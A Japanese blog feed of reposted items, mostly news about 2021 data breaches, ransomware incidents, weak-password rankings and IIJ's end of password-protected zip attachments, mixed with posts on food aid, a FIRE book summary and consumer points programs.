CIS Controls v8では、2017年に米調査会社フォレスター・リサーチ社により再定義されたZero Trust extended(ZTX)の7つの項目のうち、「Automation and Orchestration(自動化と調和)」を発展させ、Align(連携)という概念が強調されている。CIS Controlsでは、ツールを使ってシステム的にリスク対応策を実装し、常時繰り返し可能、かつ、抜け漏れなくリアルタイムにサイバー攻撃から組織を保護することを推奨してきた。自動化と調和を強調した保護策連携について、最新の事例を挙げると、ネットワーク上のサンドボックスのアラート情報をAPI連携してエンドポイントの管理センターに送り、端末の状態を修復するところまでを自動対応できるように構築する等のテクニックがある。

2021年版 脆弱なパスワードランキング / Top 200 Most Common Password List 2021(転載)


日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」

Top 200 Most Common Password List 2021

NordPass版の”最悪なパスワード2021”が公開されました。従来のグローバル統計に加えて、今年は国別データも開示されたので、日本人のよく使う”パスワード”について分析してみます。

今回はNordPassの調査データですが、例年ですと12月にSplashDataが”最悪なパスワード”として同様な調査データを公開していますが、正直な話、多少の違いはあれ、上位ランキングに掲載される脆弱なパスワードは大きくは変わらない事を確認する行事と化しています。

(おそらく今回の調査結果から登場した)日本のデータを見ていくと、過去のグローバル統計データには無い、日本人ならではと思える特徴が見えてきました。

NordPassのサイトでは、各国を選択し上位200位までのパスワードリストを見る事ができます。

グローバルデータと同じ様に、「数字」や「英語辞書単語」「キーボード配列」は多い印象です。

おそらく10年以上、こうした脆弱なパスワードは使ってはいけないと、こうした調査データを元に、ユーザーは何度もセキュリティ教育を受けてきたと思うのですが、結論から言えば、ユーザーは自身の脆弱なパスワードを「変える気が無い」事を証明し続けています。

その全てが無駄という訳ではありませんが、システム管理者(セキュリティ担当)は、ユーザーが「脆弱な状態を好む」という事をしっかりと頭に置き、過度にユーザーのセキュリティ意識(IDパスワード)に期待せずに、多要素認証など、多層防御に軸足を移す事が必要なのかと思います。

東証一部の医薬品メーカーに不正アクセス 株主の個人情報など延べ22万件が流出か(転載)


[PDF] 不正アクセスによる個⼈情報等流出の可能性に関するお知らせとお詫び 株式会社リニカル

東証一部の医薬品メーカーであるリニカルは2021年12月6日、複数拠点のサーバが不正アクセスを受け、個人株主や採用応募者などを含む、最大で延べ22万件の個人情報が流出した可能性があると発表した。犯行グループからデータに対する身代金を要求するメッセージが同社に届いたが、応じる予定はなく、今後も外部機関と連携し調査を続けて、全容解明や再発防止に努めるとしている。

同社の発表によると、2015年3月31日から21年6月30日の間、名簿上に記載があった個人株主の情報が約2万1000件、2009年3月31日から14年12月31日までの情報が約6万件(延べ件数)流出したとしている。

この他にも日本での採用応募者の個人情報が約1万4000件、取引先の社員の個人情報が約3万件、臨床試験の責任医師・分担医師の個人情報が約3万5000件、臨床試験のコーディネーター・協力者などの個人情報が約6万件などが流出した可能性があると説明している。

同社は、10月3日に日本本社と台湾拠点のサーバに、22日に欧州拠点で不正アクセスを受けたという。26日にはサーバ攻撃を行った犯行グループから身代金を要求する脅迫メッセージを確認。警察や調査会社と連携し、被害状況の確認を進める中、11月3日までに日本と台湾サーバから情報の窃取を示唆する痕跡を見つけたとしている。

その後も流出範囲の特定のため調査を続けたが、サーバ保存情報の暗号化やアクセスログの抹消を伴っていたため、物理的、技術的困難から調査は難航。二次被害を防ぐために、復元したサーバから流出した可能性のある情報の最大数を12月3日時点で見積もり、6日の発表に至ったと説明する。

同社によると、製薬会社などが委託した臨床試験の被験者データは、不正アクセスを受けたサーバとは別環境にあるため影響はなし。不正アクセスを受けた社内サーバも、起点となったVPN装置の脆弱性を修正し、多重認証を強化するなどセキュリティ対策を実施した上ですでに復旧済みであるという。

プレスリリースバックアップ

本当に食べるものに困ったときの最終手段~緊急一時食品提供~


本当に食べるものに困ったときの最終手段:

数多くの金策手段も使い果たしてどうにもならない状況もあります。

借金などの支払い関係はともかく生活費、特に食事代は絶対に確保しないと生きることもできません。

今回、そんな方のために、本当に食べ物に困ったときの最終手段の助け舟を共有させていただきます。

以前に”緊急小口資金”の貸付でも話題となった“社会福祉協議会”で食品を提供していただけるのです。

ですので、恥ずかしがらず出向き正直に“食べるものがありません”と窓口の担当に伝えてみましょう。

“緊急一時食品提供”があるのです。

これは、生活が困難な方や世帯に対しての食品提供で、趣旨に賛同してくれた企業や団体、市民から提供品を貰い食い繋ぐというもの。

当然、提供品ですので、そのときの状況により無い場合もあります。

しかし、運が良ければ、”お米”や“乾パン”、”レトルト食品”などを1週間分ほど受け取ることが可能。

金策することも勿論、大事ですが日々の食品も絶対に欲しいところ。

一度、お住いの“社会福祉協議会”に聞いてみてはいかがでしょうか。

【悲報】NHKアナウンサーがきんに君でツボって放送事故!?(転載)



2021年12月7日に、福岡市の東警察署で一日警察署長を務めたというタレント・なかやまきんに君。

インタビューで、ポーズをとり「パワー!」と叫ぶおなじみのきんに君のギャグ映像を見たことで、NHKの一橋忠之アナウンサーがひたすら笑いをこらえ、次のニュースを読むことが困難な状態に陥っていた。



IIJ が PPAP 根絶へ(転載)

IIJ が PPAP 全廃へ

メールにファイルを添付して送信する際、「パスワード付きのzipファイルと、そのパスワードを別送する」という手順で行われている情報セキュリティ対策手法、いわゆる「PPAP」につきまして、当社は2022年1月26日より、社外の方からのIIJアドレスへのメール送信における対応を、原則として以下のように変更いたします。

2022年1月25日以前従来通り、パスワード付きzipファイルが添付されたメールを受信する
2022年1月26日以降パスワード付きzipファイルをフィルタにより削除し、メール本文のみ受信する


変更に至った背景

メールにパスワード付きのzipファイルを添付して送信し、そのパスワードを後送する「PPAP」は、日本において多く見られる情報セキュリティ対策の一つですが、効果が薄いだけでなく、ウィルススキャンをすり抜けてしまうことから、米国のサイバーセキュリティ・インフラセキュリティ庁においてもブロックすることが推奨されています。

この仕組みを悪用したマルウェアは今後も発生することが予想されることから、当社だけでなく、お客様、お取引先様よりお預かりする情報を守るためにも、対応が必要との考えに至りました。

パスワード付き (暗号化) ZIP廃止の考え方と対策

読書感想文「FIRE 最強の早期リタイア術」


ちょっと気になったFIRE本を読んでみた。

結果として、いろいろ参考になる知見を頂くことができた。

読書感想文と称して気になったメモを残しておく。

■第1章:お金のためなら血を流す

・お金に執着する「欠乏マインド」は重要

■第2章:桃のシロップ、段ボール箱、コカ・コーラの缶

・貧困は4つの重要なスキル「CRAP(うんこ)」を与えてくれる

 -Creativity(想像力):バービーハウスを買うお金がないので段ボールで自作する想像力

 -Resilience(回復力):他人は他人、自分は自分と割り切れる力

 -Adaptability(適応力):住めば都

 -Perseverance(忍耐力):大学は成績1番でなくても学位をとれればよい

■第3章:(まだ)自らの情熱に従うな

・キャリアを選ぶのに自らの情熱に従うのは良くない

・POTスコアを基準にキャリアを選ぶ

-POTスコア=(給与の中央値-最低賃金の差額)÷学位に掛かった総費用

役者の例:(36,380USD-15,000USD)÷40,920USD=0.52

芸術家の例:(48,780USD-15,000USD)÷40,920USD=0.83

↑の場合、学位取得のコストを踏まえると、POTスコアが高い芸術家の方が、役者よりため、役者よりトータルの収入が上になることを示す。

■第4章:あなたは私のものだ

72の法則

・消費者ローンは最悪の借金

・学生ローンは2番目に最悪な借金

■第5章:誰も助けにきてはくれない

・失敗は選択肢の一つ

・自分自身のセーフティネットを構築する

 -食べるものに起きるものにも困らない、会社や政府にも頼らないセーフティネット

■第6章:ドーパミンについてわかったこと

・モノの所有と幸福度の比例関係には上限がある(モノの増加はストレス因子にもなる)

・経験(≒旅行)と幸福度の比例関係には上限がない

・すべての節約に痛みが伴うわけではない。

 -メインバンクをオワコンの都市銀行からネットバンクに変えてATM手数料を節約

 -携帯電話を情弱者向けのメガキャリアからMVMO(格安SIM)に切り替えて月額費用を節約

 -固定電話の廃止

 -車を所有しない(カーシェアリングの活用)

 -自分へのご褒美(コンサート、旅行、スキューバダイビング、etc)はケチらない

■第7章:マイホームは投資ではない

・持ち家か賃貸かの判断に使える「150の法則」

 -米国で標準的な30年ローンの場合、最初の9年間は返済額の5割が利息の支払いになる

 -持ち家に伴う追加費用(登記費用、固定資産税、仲介手数料、保険、etc)

※米国の制度に則った考え方になるが、一応計算してみると下記になり、持ち家は割に合わないことになる。

・現在の賃貸の家賃が6万円/月

・もし毎月6万円のローン支払いで家を買うことができた場合、実際のコスト負担は9万円となる

・貧しい人はモノを買う。中産階級は家を買う。お金持ちは投資資産を買う。

■第8章:本物の銀行強盗


・アクティブファンドはインデックスファンドに勝てない

・インデックスファンドは手数料が安い

■第9章:株式市場の暴落をいかに乗り切るか

・株式はボラティリティよりも複利効果の方が重要

・人気のあるETF:VTI、ZCN、VEA、BND、ZAG

・下落時に売って回復期に利益を逃すことがお金を失い続ける唯一のパターン(→リバランシングでこれを回避。安く売って高く買うを継続)

・書籍でのポートフォリオは株式6割、債券4割

■第10章:私を救ってくれた魔法の数字

・4パーセントルール

もし1年間の生活費が投資ポートフォリオの4パーセントと等しい金額であれば、リタイアしても95%の確率で30年以上にわたり老後資金が底をつかないという法則

1年間の生活費が投資ポートフォリオの4パーセントというのは1年間の生活費の25倍と同数となる

1年間の生活費が400万円の場合、400万円×25=1億円の投資ポートフォリオがあれば、FIRE可能ということになる

 4%ルールは投資ポートフォリオのインカムゲインとキャピタルゲインが平均4%以上の場合にのみ成り立つルールとなり、日本株では実現不可となり、米国株ETFでの運用が唯一の選択肢となる 

1億円の投資ポートフォリオを積み立てだけで形成するのはほぼ不可能。実物の不動産投資等レバレッジをかけた資産形成が現実的。 

・リタイアできるタイミングを決める唯一最大の要因は貯蓄率。年収は関係ない。 

■第11章:現金クッションと利回りシールド

・4パーセントルールに従っても、シークエンス・オブ・リターン・リスク(リタイアとともに不運にも下落相場が始まり、資産の取り崩しを余儀なくされる状況)によって、5%の確率で途中で資金をつく可能性がある。

・シークエンス・オブ・リターン・リスクに、利回りシールドと現金クッションで対応する

・利回りシールド

ETFが支払う分配金のことで、資産を売却することなく現金として手に入る

・現金クッション

預金口座に入れておく緊急時の準備金。これを用意することで、下落相場の時にポートフォリオを崩さずに済む 。

・資産の一部を高利回り資産に置き換えることで、利回りシールドの強化が可能

-優先株:XPF、PFF、PGX

-不動産投資信託(REIT):XRE,USRT

-社債:VTC、XCB

-高配当株:VYM、XDV、IDV

・現金クッションの必要金額は計算可能

現金クッション=(年間支出-年間利回り)×現金クッションの必要年数

年間生活費が400万円、ETF分配金利回りが2.5%、ポートフォリオの規模が1億円、現金クッションの必要年数(最悪のケースである世界恐慌で5年なので、5年で試算)の場合、必要な現金クッションは下記となる

 (400万円-(1億円×2.5%))×5=750万円

■第12章:お金を浮かすために旅行する

・西欧など物価の高い地域と、東欧や東南アジアなど物価の安い地域をうまく組み合わせることで、旅の予算を「デザイン」することが可能

・Airbnbを活用することで、ホテルよりも安く民間施設に泊まれ、キッチン付きが多いため自炊もでき、旅行者ではなく、地元民の目線で生活が可能。

・旅行保険には必ず加入しておく

・著書の経験では1年間の旅行を4万USDで実現

■第13章:バケツアンドバックアップ

・リタイア後の資金を管理すために3つのバケツを用意する

-ポートフォリオ:リタイア後の生活を支える投資ポートフォリオ用のバケツ

-ことしの支出:その年に使う予定の資金を入れておくバケツ 

-現金クッション:普通預金口座に準備金を入れておくバケツ 

 ■第14章:インフレ、保険も恐るるに足らず

・旅行をすることでインフレの影響を回避することが可能。インフレは一国の経済現象のため、国を変えることで回避できる。

・車が無ければ自動車保険は不要

・リタイア後は生命保険も不要(構築したポートフォリオが家族の生活費の面倒を見てくれる)

■第15章:子供はどうする

・旅をしながら子育てをする「ワールドスクーラー」が存在

■第6章:早期リタイアの負の側面

・お金が底をつく:利回りシールドや現金クッションの戦略で対応。お金が底をつく恐怖心を過剰に持つ必要はない

・コミュニティの喪失:人とは違う道を歩むことで離れていく友人は、つづける価値のない友人である。代わりに世界中の新たな真の友人と出会うことができる。

・アイデンティティの喪失:これまでのアイデンティティを捨て、新しいアイデンティティをを確立する。

■第17章:自由になるのに100万ドルは必要ない

 ・サイドFIRE:リタイア後も副業を持つことで100%経済的に自立していなくてもOK

 ・地理的アービトラージ:弱い通貨の国でリタイア後の生活を送る

■第18章:我が道を行け

・お金持ちになるカギは自分に最も合ったやり方(ハスラー型、投資家型、オプティマイザー型)を選ぶこと

練馬区で「我が家のSNSルール」にパスワード記載し提出を依頼(転載)~区民への啓蒙の前に職員への教育を徹底せよ!!~

練馬区で「我が家のSNSルール」にパスワード記載し提出を依頼

東京都練馬区は2021年12月3日、区立中学校における個人情報の不適切な取扱いについて発表した。

練馬区教育委員会では、児童生徒の情報モラル向上と情報端末に係る事故の防止に向けて、家庭でのSNSルールづくりを啓発・促進するために、SNS練馬区ルール・リーフレットを作成し各家庭に配布、各校に対してもルールづくりの状況を確認するために各家庭で作成した、パスワードを記載しない状態でのリーフレット提出を求めるよう通知していた。

練馬区によると、練馬区立中学校1校で11月19日に、12月実施の三者面談で生徒のSNS利用に関する注意喚起を行うため、各家庭にSNS練馬区ルール・リーフレットの「我が家のSNSルール」を提出するよう依頼したが、その際にSNSのパスワード記載は不要との説明を失念したため、提出した生徒のパスワードを学校が知り得る事態であったことが11月30日に保護者からの連絡で判明した。パスワードを「未記載」または「削除・マスキングした状態」で提出する旨の説明を失念したことが原因という。

同校では12月2日時点で、276名からのリーフレットの提出を受け付けていた。なお、受け付けたリーフレットは学校の施錠できる場所で保管しており、順次各家庭に返却を行っているため、パスワード漏えいは発生していない。

同校では12月3日に、各家庭に謝罪文を送付している。

教育委員会では12月1日に、区内の全校に注意喚起を促すとともに、12月2日に他の学校で同様の事態が発生していないことを確認済み。

同区では今後、改めて各学校に通知を行うとともに、今後発行する同リーフレットではパスワード記載箇所を削除するとのこと。

プレスリリースアーカイブ

パナソニックの機密データがハッカーに盗まれる / Хакеры скомпрометировали конфиденциальные данные Panasonic(転載)


Хакеры скомпрометировали конфиденциальные данные Panasonic

パナソニックは、未知の攻撃者が同社のネットワーク上のサーバーにアクセスしたというサイバー攻撃を報告しました。

パナソニックは、2021年11月11日にネットワークのハッキングを明らかにしました。内部調査の結果、ファイルサーバー上の一部のデータが攻撃時にアクセスされたことが判明しました。

パナソニックは、関係当局に報告するとともに、外部サーバーからのネットワークへのアクセスを防止するための対策を講じました。また、第三者のIS専門家を雇い、攻撃を調査し、漏洩したデータに顧客の個人情報が含まれているかどうかを判断してもらいました。

同社はサイバー攻撃が行われた正確な時期を明らかにしていないが、毎日新聞とNHKは、攻撃者が今年6月から11月の間にパナソニックのサーバーにアクセスしたと伝えている。報道機関によると、攻撃者は顧客情報、従業員の個人情報、パナソニックの技術ファイル、同社の社内業務などの機密情報へのアクセスに成功したとのことです。

ー2021/12/9追記ー

区分マンションに投資する時の注意点~管理費+修繕積立金が家賃の3分の1以内に収まっていることが重要~(転載)


区分マンションに投資する時の注意点について解説しました😌中古マンション買うなら絶対ココを見ろ!

#Shorts invidious.fdn.fr/shorts/iE2TI4ZC9…



ドレス通販サイトに不正アクセス - クレカやログイン情報流出の可能性(転載)


弊社が運営する「Tika」への不正アクセスによる 個人情報漏えいに関するお詫びとお知らせ 株式会社DRESS DESIGN WORKS 

DRESS DESIGN WORKSは、ドレスなど衣料を扱う通信販売サイト「Tika」が不正アクセスを受け、顧客のログイン情報やクレジットカード情報が外部に流出した可能性があることを明らかにした。

同社によれば、第三者のなりすましによる不正アクセスにより、決済アプリケーションを改ざんされたもの。2020年2月24日から2021年4月20日にかけて顧客8306人がサイト上より入力したクレジットカード情報が外部に流出し、不正に利用された可能性がある。

対象となるクレジットカード情報は9656件。クレジットカードの名義、番号、有効期限、セキュリティコードが含まれる。決済時に登録済みのクレジットカード情報を用いた場合は影響を受けないとしている。

また対象期間中に同サイトへログインした顧客のメールアドレス、パスワード、生年月日についても流出した可能性があるという。

4月21日にシステム会社から情報流出の可能性について指摘があり問題が発覚。同社では5月19日にクレジットカード決済を停止。外部事業者による調査を進めていた。

9月29日に調査を終えており、同社では10月22日に警察へ被害を申告。10月27日に個人情報保護委員会へ報告した。対象となる顧客に対しては、12月6日より報告と謝罪のメールを送付。身に覚えのない請求に注意するよう呼びかけている。

「魚がし鮨お持ち帰り予約サイト」におけるお客様情報流出について


[PDF] 弊社が運営する「魚がし鮨お持ち帰り予約サイト」への不正アクセスによるお客様情報流出に関するお詫びとお知らせ 沓間水産株式会社

uogashizushi.co.jp/wp-content/upl…

「魚がし鮨お持ち帰り予約サイト」をご利用お客様へ 

2021 年 12 月 6 日 
沓間水産株式会社 

弊社が運営する「魚がし鮨お持ち帰り予約サイト」への不正アクセスによる お客様情報流出に関するお詫びとお知らせ 

このたび、弊社が運営する「魚がし鮨お持ち帰り予約サイト」の EC サイト(以下 「本件 EC サイト」といいます)におきまして、第三者による不正アクセスを受け、 お客様のクレジットカード情報漏洩対象者件数652件が流出した可能性があるこ とが判明いたしました。 
お客様に多大なるご迷惑およびご心配をおかけする事態となりましたこと、深くお 詫び申し上げます。 

弊社では、今回の事態を厳粛に受け止め、再発防止のための対策を講じてまいります。 
お客様には重ねてお詫びを申し上げますとともに、本件に関する概要につきまして、 下記の通りご報告いたします。なお、個人情報が漏洩した可能性のあるお客様には、 本日より、書状にてお詫びとお知らせを個別にご連絡申し上げております。 

1. 経緯 
2021 年 9 月 3 日、当該サイトの構築・運用委託先の東芝テック株式会社、株式会社 ジーアールから、弊社サイトを利用したお客様のクレジットカード情報の漏洩懸念 について連絡を受け、2021 年9月4日弊社が運営する「魚がし鮨お持ち帰り予約サ イト」でのカード決済を停止いたしました。 
同時に、第三者調査機関による調査も開始いたしました。2021 年 9 月 30 日、調査 機関による調査が完了し、2021 年 3 月 26 日~2021 年8月 19 日の期間に 「魚が し鮨お持ち帰り予約サイト」で購入されたお客様クレジットカード情報が漏洩した 可能性がございます。
以上の事実が確認できたため、本日の発表に至りました。 

2.情報の流出状況 
(1)原因 
情報が漏えいした原因は、本件 EC サイトのシステムの一部の脆弱性をついて第三 者の不正アクセスを受け、悪性ファイルが設置されたためです。 

(2)情報流出の可能性があるお客様 
2021 年 3 月 26 日から 2021 年 8 月 19 日の期間中に「魚がし鮨お持ち帰り予約サイ ト」においてクレジットカード決済をされたお客様。 

(3)流出した可能性のある情報
・カード名義人名 
・クレジットカード番号 
・有効期限 
・セキュリティコード 

3. お客様へのお願い 
既に弊社では、クレジットカード会社と連携し、流出した可能性のあるクレジット カードによる取引のモニタリングを継続して実施し、不正利用の防止に努めており ます。 
お客様におかれましても、誠に恐縮ではございますがクレジットカードのご利用明 細書に身に覚えのない請求項目がないか、今一度ご確認をお願いいたします。万が 一、身に覚えのない請求項目の記載があった場合は、たいへんお手数ですが同クレ ジットカードの裏面に記載のカード会社にお問い合わせいただきますよう、併せて お願い申し上げます。 
なお、お客様がクレジットカードの差し替えをご希望される場合の、カード再発行 の手数料につきましてはお客様にご負担をお掛けしないようクレジット会社に依頼 しております。 

4.情報通知について 
本件につきましては、不確定な情報の公開は不要な混乱を招くおそれがあったこと から、クレジット会社等と協議の上、第三者調査会社の調査を受け、クレジット会 社その他関連機関との連携を確保した上で通知することに致しました。 
それにより、今回のご案内までお時間をいただきましたことを重ねてお詫び申し上 げます。 

5.再発防止について 
弊社はこのたびの事態を厳粛に受け止めており、調査結果を踏まえてシステムのセ キュリティ対策および監視体制の強化を行い、再発防止を図ってまいります。 
本件ECサイトは9月 6 日時点ですみやかに停止及びアクセス遮断を行うとともに、 有人での監視、不正アクセスへの防御対応、脆弱性の解析、対策を行っており、 その後の情報漏洩は確認されておりません。 
現在、EC サイトについても運用を停止しておりますが、再開する際は弊社ホームペ ージにてご案内いたします。 また、弊社は今回の不正アクセスにつきまして、個人情報保護委員会に 2021 年 9 月 7 日に報告しております。加えて、所轄警察である裾野警察署にも 2021 年 9 月 8 日 に届出済みであり、今後捜査にも全面的に協力してまいります。

骨盤ベルト通販サイトに不正アクセス - クレカ情報など流出した可能性(転載)


【限定】トコちゃんドットコムECサイトからのカード情報漏えい:
骨盤ベルト通販サイトに不正アクセス - クレカ情報など流出した可能性
 

骨盤ベルトの通信販売を手がける「トコちゃんドットコムECサイト」が不正アクセスを受け、顧客のアカウント情報やクレジットカード情報が流出し、一部が不正利用された可能性があることがわかった。

同サイトを運営するトコちゃんドットコムによれば、システムの脆弱性を突く不正アクセスにより、決済アプリケーションを改ざんされ、6月17日から7月2日にかけて同サイトを利用し、商品を購入した顧客情報507件を窃取された可能性があることが判明したもの。

ログインID、パスワードのほか、名義、番号、有効期限、セキュリティコードなどクレジットカード情報を窃取され、不正に利用された可能性があるという。

7月6日に不正なファイルを発見。「クロスサイトスクリプティング(XSS)」の記載を含む不審な注文が行われていたことなども確認したことから同日サイトを停止し、外部事業者による調査を行っていた。

調査は9月28日に完了。10月6日に警察へ申告し、翌7日に個人情報保護委員会へ報告した。同社では、対象となる顧客に対し11月15日より書面による報告と謝罪を行っている。たけy同社では、システムのセキュリティ対策および監視体制の強化を行ったうえで、サイトを再開する予定。

プレスリリースバックアップ

ー2021年11月15日追記ー

弊社が運営する「トコちゃんドットコムECサイト」への不正アクセスによる個人情報漏えいに関するお詫びとお知らせバックアップ

通販サイトへの不正アクセス、クレカ流出の調査結果が判明 - グラントマト(転載)

グラントマトオンラインショップからのカード情報漏えい(オムニEC)

通販サイトへの不正アクセス、クレカ流出の調査結果が判明 - グラントマト

福島県を中心に東北地方や関東北部で店舗を展開するグラントマトは、同社通信販売サイト「グラントマトオンラインショップ」のシステムが不正アクセスを受けた問題で、調査結果を明らかにした。

同サイトの運用で利用していたジーアールのECサービス「オムニECシステム」が不正アクセスを受けたもの。同システムを利用する他事業者において情報が流出した可能性があることが9月4日に判明。同社においても9月17日に事態を公表するとともに、東芝テックやジーアールと連携し、詳細について調査を進めていた。

判明当初、本誌の取材に対してオンラインストアの顧客情報約5000件やクレジットカード情報約250件を窃取された可能性があるとの見解を示していたが、外部事業者の実施した調査でクレジットカードに関しては、4月7日から8月19日にかけて利用された349件が流出した可能性があることが明らかになったという。

流出内容には、クレジットカードの名義、番号、有効期限、セキュリティコードなどが含まれる。11月15日の時点で不正利用の被害などは確認されていない。

ー2021年11月15日追記ー

不正アクセスによる個人情報流出の可能性に関する調査結果のご報告バックアップ

Trip.com、ホテル予約でPontaポイントが貯まるサービスを開始(転載)


Trip.com、ホテル予約でPontaポイントが貯まるサービスを開始:

Trip.comでは、2021年11月19日(金)より、ホテル予約でPontaポイントが貯まるサービスを開始した。

11月19日(金)以降、Trip.comで国内および海外のホテルを予約し、宿泊すると、宿泊料100円(税抜)につき1 Pontaポイント貯まる。予約時にPonta会員用のwebページを利用することでホテル宿泊の2ヵ月後にPontaポイントが加算される。

また、Trip.comの会員プログラム「Trip Coins」とPontaポイントをダブルで貯める事は可能だ。

群馬大が不正アクセスを受け、57万件の迷惑メールが送信される(転載)


迷惑メール 群馬大から57万件送信 不正アクセス原因 被害は未確認:東京新聞 TOKYO Web tokyo-np.co.jp/article/142728
tokyo-np.co.jp/article/142728

群馬大のメールサーバーが不正アクセスを受け、学外を含めて計約57万件という膨大な迷惑メールが送信されていたことが2021年11月13日、分かった。群大は発生した九月下旬から現在までに、被害や情報の流出は把握していないが、陳謝して再発防止策を講じた。県内の大学では、高崎経済大でも不正アクセスにより迷惑メールが大量に送信される事態が起きている。

群大によると、不正アクセスを受けたのは、協力研究員、同窓会や後援会などの関連団体と業務委託先の関係者らが利用するサーバー。学生や教職員が利用するシステムからは独立し、学生などに被害はない。

利用者一人分のアカウントが不正アクセスを受け、迷惑メールが9月21日〜24日に三回に分けて計約33万のアドレスに送信された。迷惑メールは大学関係者以外の外部にも送信されたという。

同24日、利用者から大量のエラーメールが返信されたとの報告があり、事態が発覚。迷惑メールには英文が含まれ、情報流出が懸念されるウェブサイトへ誘導するような記載があったという。事態を受け、群大はサーバーに学外からのアクセスを制限し、その後にサーバーを廃止した。

群大は「関係者の皆さまに大変なご迷惑を掛け、深くおわびします。極めて重大な問題と受け止め、このような事態が二度と起こらないよう一層の情報管理の徹底を図り、再発防止を講じる」と謝罪している。

県内の大学では、高経大でも6月、教員一人のメールアカウントとパスワードが不正利用され、約六千件の迷惑メールが送信された。現在までに被害や情報流出は把握していないという。

本当に「前例はない」のか ニップンが“決算延期”に陥った大規模攻撃の教訓(転載)~大切なのは基本的な対策(バックアップ、パッチ適用)を淡々と着実に実施すること~


先日、製粉大手のニップンが、サイバー攻撃を受けて発生したシステム障害の詳細を明らかにした。ニップン本体のファイルサーバの他、グループ企業も利用している財務会計システム、販売管理システムなどが被害に遭い、多数のファイルが暗号化され、起動できなくなった。オンラインバックアップも被害に遭い、サーバの早期復旧が困難となった結果、2021年4~6月期の決算報告書の提出を、約3カ月延期する事態に陥った。

公表された資料では、サイバー攻撃がどのような経路で行われたか、またファイルの暗号化はいわゆるランサムウェアによるものか、それとも何らかの手段で遠隔操作されたのかなど、詳しい手法は明らかにされていない。ただ、影響範囲の大きさからか、調査や対応支援に当たった外部専門家は「これほど広範囲に影響を及ぼす事案は例がなく」と表現している。

だが見方によっては、実際には前例はあったともいえるのではないだろうか。というのもこの数年、サイバー攻撃を受けてメールサーバが停止したり、工場やプラントの操業が停止に追い込まれたりと、自社やパートナー企業、顧客、ひいては社会に大きな影響を与えるセキュリティ事故はたびたび発生してきたからだ。

最近でいうと、ランサムウェアによる被害が典型例だろう。

セキュリティ関連のニュースに興味を持っている人ならば、ランサムウェアという言葉は、おそらく耳にしたことがあるだろう。昨年ごろから目立つのは、国内外の企業を対象に攻撃を仕掛け、社内に保存されていた個人情報や機密情報を盗み出し、「ネット上でこれらの情報を公開されたくなければ引き換えに金銭をよこせ」と要求するランサムウェアだ。

もう少しさかのぼってみよう。3~4年前に流行したのは、Windowsの脆弱(ぜいじゃく)性を突いて感染を広げる「WannaCry」と呼ばれるランサムウェアだ。感染すると周辺の端末やサーバのデータを暗号化し、システムが立ち上がらず、ファイルも見られないような状態にしてしまい、「もしファイルを元に戻してほしければ金銭をよこせ」と要求するものだ。

このときも、海外のさまざまな組織・企業はもちろん、日本企業も被害に遭った。被害を公表した中には、メールシステムに障害が生じて顧客とのコミュニケーションに支障が生じたり、生産に影響が出たりしたケースが含まれており、バックアップデータを基にシステムを復旧するのに多くの労力が費やされた。

その後もランサムウェアは継続的に、それもややターゲットを絞ってカスタマイズされて、企業を襲い続けている。2020年前半にもランサムウェアの被害に遭った日本企業が、数日間工場の操業を停止したケースが報じられた。海外では米石油パイプライン大手のColonial Pipelineがランサムウェアの被害に遭い、全てのパイプラインの操業を一時停止し、社会的な混乱を招いたケースが報じられている。

今回のニップンのサイバー攻撃は、ランサムウェアによるものとは明言されていないが、生じた影響という意味では過去にも似たようなケースは多々発生している。対象がメールか、工場を制御する生産制御システムか、あるいは財務会計・販売管理システムかの違いはあるが、本質的には「事業を動かすシステムが何らかの原因によって動かなくなり、甚大な影響が生じてしまった」ことに変わりはない。

一方で、DX(デジタルトランスフォーメーション)の進展や人手不足を補うためのシステム化により、事業のITへの依存度はますます高まっている。もしそれらが健全に運用ができなくなれば、問題は「個人情報が漏えいしてしまってご迷惑をおかけした」という話では済まない(それでも十分に大事だが)。もはや「仕事にならなく」なってしまうだろう。

つまりサイバー攻撃は、データの機密性や完全性だけでなく、事業の可用性に大きな影響を与える恐れのある経営問題として捉えなければならない。となると、IT部門任せではなく経営者の関与が不可欠だ。

ただ悩ましいのは、それ以外にも、企業を取り巻く脅威はさまざま存在することだ。ちょっと前に日本で猛威を振るった「Emotet」をはじめ、実在する組織や人物になりすましたメールを送ってユーザーをだますサイバー攻撃は、手を変え品を変えやってくる。

また、OSやWebブラウザなど汎用的なシステムだけでなく、セキュリティ機器や資産管理ツール、サプライチェーンのつながりを狙ったより高度な標的型攻撃も留意しなければいけない。その上、8月頭に報じられた、警視庁職員が26万人分の運転免許証データを削除した事件のように、内部関係者による犯行も考えられる。

あれもこれもとリスクが考えられる中、一体何から手を付ければいいか分からない、といった悩みが生じるのも無理はない。だが、答えはシンプルだ。

個々の事件に右往左往することなく、淡々と基本的な対策を実施し、かつ、対策が有名無実になっていないかを確認し続けていくことしかないだろう。もちろん予算は有限だから、まずは「自社にとって大事なもの」「絶対止まってはいけないもの」を見定めて、順に基本的な対策を取っていくしかない。この優先順位を決めるのも、やはり経営層の関与なしには進められない。

その次のステップは、自社が管理するIT資産を洗い出し、それらに存在する脆弱性の管理・修正を行うことだ。同時に「万が一」はあり得るという前提に立って、そのときどうシステムを復旧するかを考える次善の策も不可欠だ。

例えば、データ破壊というリスクに対してはバックアップ、それも重要なデータについてはオフラインでのバックアップを取得し、いざというときにきちんとリカバリーするための手順作成とリハーサルが重要となる。これらは常々、情報処理推進機構(IPA)が発表している「10大脅威」をはじめ、さまざまなレポートで対策として挙げられてきたことだ。

またマルウェア侵害や内部犯行に対しては、海外も含む拠点単位でのアクセス制御、必要以上の操作ができないようにする権限管理、なりすましを防ぐ強固な認証……といった事柄が重要になってくる。はやり言葉ではあるが、最近しばしば言われる「ゼロトラストセキュリティ」が提唱する事柄にも通じる部分がある。

どうしても「前例がない」といわれると、とても対策などありえない恐ろしい攻撃のように思われてしまうが、コンピュータシステムというものの本質が数十年変わっていない以上、よくよく見ていくと前例は必ずある。そうした過去の例から本質をつかみ、基本的な対策を実直にやっていくことが何よりも重要だろう。

近年、全国各地で「数十年に一度」といわれる深刻な災害発生の危険度が高まり、命を守る行動を取るよう呼びかけられることが少なくない。

その際役に立つのは、自分のいる場所がどのくらいリスクにさらされているかを示すハザードマップと最新の正確な情報。そして、備蓄や避難経路の確認といった普段からの備えだ。さらにもう一つ大事なのは、過去に起こった災害に人々がどう対処したかを知ることだろう。

前例のないように思える災害でも、似たような地形の別の場所で似た災害が起こっていたりする。過去の例を知っていざというときに備えることで、自分にとっては未知の災害でも対処し、かけがえのない人命や財産を守れるだろう。

